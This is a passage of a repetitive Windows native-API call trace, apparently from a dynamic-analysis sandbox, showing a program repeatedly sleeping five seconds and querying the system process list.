NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 